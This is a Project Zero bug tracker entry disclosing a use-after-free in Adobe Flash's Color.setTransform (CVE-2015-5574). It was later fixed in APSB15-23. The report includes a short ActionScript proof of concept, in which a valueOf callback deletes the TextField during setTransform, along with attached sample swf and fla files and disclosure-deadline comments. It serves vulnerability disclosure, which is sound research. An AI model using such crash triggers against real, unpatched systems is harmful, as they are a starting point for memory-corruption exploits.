451 - Adobe Flash: Use-after-free in Color.setTransform - project-zero

Starred by 2 users

Status:	Fixed
Owner:	natashenka@google.com
Closed:	Sep 2015
Cc:	project-...@google.com
CVE-2015-5574 Reported-2015-Jun-15 Finder-natashenka Deadline-90 Deadline-Grace Deadline-Exceeded CCProjectZeroMembers Product-Flash Severity-High Vendor-Adobe

Adobe Flash: Use-after-free in Color.setTransform

Project Member Reported by natashenka@google.com, Jun 16 2015

Back to list

If Color.setTransform is set to a transform that deletes the field it is called on, a UaF occurs. A PoC is as follows:

var tf:TextField = this.createTextField("tf",1,1,1,4,4)

var n = new Object();

n.valueOf = function () {
	trace("here");
	tf.removeTextField()
}

var o = {ra: n, rb:8};

var c = new Color(tf)
c.setTransform(o)


A sample swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

settransform2.fla
4.9 KB Download

settransform2.swf
732 bytes Download

Project Member Comment 1 by natashenka@google.com, Jun 17 2015

Labels: -Reported-2015-Jul-15 Reported-2015-Jun-15

Project Member Comment 2 by hawkes@google.com, Aug 21 2015

Owner: natashenka@google.com

Project Member Comment 3 by hawkes@google.com, Sep 21 2015

Labels: CVE-2015-5574
Status: Fixed

Fixed in APSB15-23

Project Member Comment 4 by hawkes@google.com, Sep 21 2015

Labels: Deadline-Exceeded Deadline-Grace

Project Member Comment 5 by natashenka@google.com, Mar 31 2016

Labels: -Restrict-View-Commit

► Sign in to add a comment